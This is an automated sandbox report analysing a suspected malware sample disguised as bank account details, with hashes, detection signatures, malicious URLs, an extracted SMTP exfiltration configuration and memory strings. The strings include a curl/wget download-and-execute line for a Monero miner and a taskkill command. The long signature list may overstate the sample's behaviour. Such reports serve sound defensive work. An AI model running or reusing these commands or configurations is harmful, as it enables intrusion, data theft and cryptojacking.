Windows Analysis Report Foreign_Bank Account Details.exe

Overview

General Information

Sample Name: Foreign_Bank Account Details.exe
Analysis ID: 1613
MD5: 8906fa5fed7b1d3d2e5579d97419c076
SHA1: f4488a79fcb657eb1f3f23c6ce181ae7176fb11c
SHA256: d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Detected Hacktool Mimikatz
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Ragnarok ransomware
Yara detected Globeimposter Ransomware
Yara detected Evrial Stealer
Yara detected Avaddon Ransomware
Yara detected GhostRat
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Koadic
Yara detected Jigsaw
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected Rapid ransomware
Yara detected RansomwareGeneric
Yara detected Ouroboros ransomware
Yara detected Fiesta Ransomware
Yara detected Lolkek Ransomware
Yara detected LimeRAT
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Yara detected TeslaCrypt Ransomware
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Crypt ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected ISRStealer
Yara detected LockBit ransomware
Yara detected LOCKFILE ransomware
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Niros Ransomware
Yara detected Buran Ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Detected Remcos RAT
Sigma detected: RegAsm connects to smtp port
Yara detected RevengeRAT
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected Parallax RAT
Yara detected GlobeLocker Ransomware
Yara detected Zeppelin Ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected AgentTesla
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Detected Nanocore Rat
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected CryLock ransomware
Yara detected Pony
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Zeoticus ransomware
Yara detected Porn Ransomware
Yara detected DarkSide Ransomware
Malicious sample detected (through community Yara rule)
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected WormLocker Ransomware
Yara detected Mailto ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Betabot
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected 0x0M4R Ransomware
Yara detected Growtopia
Yara detected Windows Security Disabler
Yara detected Amnesia ransomware
Yara detected Dorkbot
Contains VNC / remote desktop functionality (version string found)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Hides threads from debuggers
Writes to foreign memory regions
Yara detected MSILLoadEncryptedAssembly
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Sample is not signed and drops a device driver
Tries to harvest and steal browser information (history, passwords, etc)
Found string related to ransomware
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Modifies the hosts file
May drop file containing decryption instructions (likely related to ransomware)
Yara detected Autohotkey Downloader Generic
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Creates driver files
Checks if the current process is being debugged
May initialize a security null descriptor
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Uses SMTP (mail sending)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack Malware Configuration Extractor: Pony
Source: RegAsm.exe.5916.8.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}
Source: MpSigStub.exe.3992.35.memstrmin Malware Configuration Extractor: CryLock
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Multi AV Scanner detection for submitted file
Source: Foreign_Bank Account Details.exe ReversingLabs: Detection: 33%
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: http://www.bonusesfound.ml/update/index.php Virustotal: Detection: 13%
Source: http://110.42.4.180: Virustotal: Detection: 13%
Antivirus or Machine Learning detection for unpacked file
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bc6cad6.47.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 35.3.MpSigStub.exe.15b1a70f33e.138.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26ED10 CryptUnprotectData, 8_2_1D26ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26F3A1 CryptUnprotectData, 8_2_1D26F3A1
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary, 42_2_00007FF650D4C1C4
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits:

Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz
Source: MpSigStub.exe, 00000023.00000003.18325905490.0000015B1AC98000.00000004.00000001.sdmp String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Coinhive miner
Source: Yara match File source: 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18352105294.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18312369918.0000015B1C094000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299055991.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18403655888.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18409201535.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18410667523.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18324208366.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18311556427.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18307459590.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18337113449.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18329511287.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18402637724.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18328153087.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18417425467.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18418037701.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18418460951.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18340382300.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18418909373.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332249196.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18343459823.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18306567757.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18411594732.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18317647190.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305228496.0000015B1B858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18403089371.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18316329497.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18301965811.0000015B1AEB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335934182.0000015B1B858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18331852304.0000015B1A84E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18411989385.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected BitCoin Miner
Found strings related to Crypto-Mining
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: ./meme-acryptonight-ostratum+tcp://xmr.crypto-pool.fr
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: window.exe-acryptonight-ostratum+tcp://monerohash.com:2222-u
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: TrojanDownloader:HTML/Xmrminer!mclg
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: /xmr-stak-cpu
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: /c taskkill /f /im NsCpuCNMiner* & tskill NsCpuCNMiner*
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber||wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: XMRig miner

Compliance:

Uses 32bit PE files
Source: Foreign_Bank Account Details.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: Binary string: Unite.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp
Source: Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp
Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000023.00000003.18299991338.0000015B1C3DD000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp
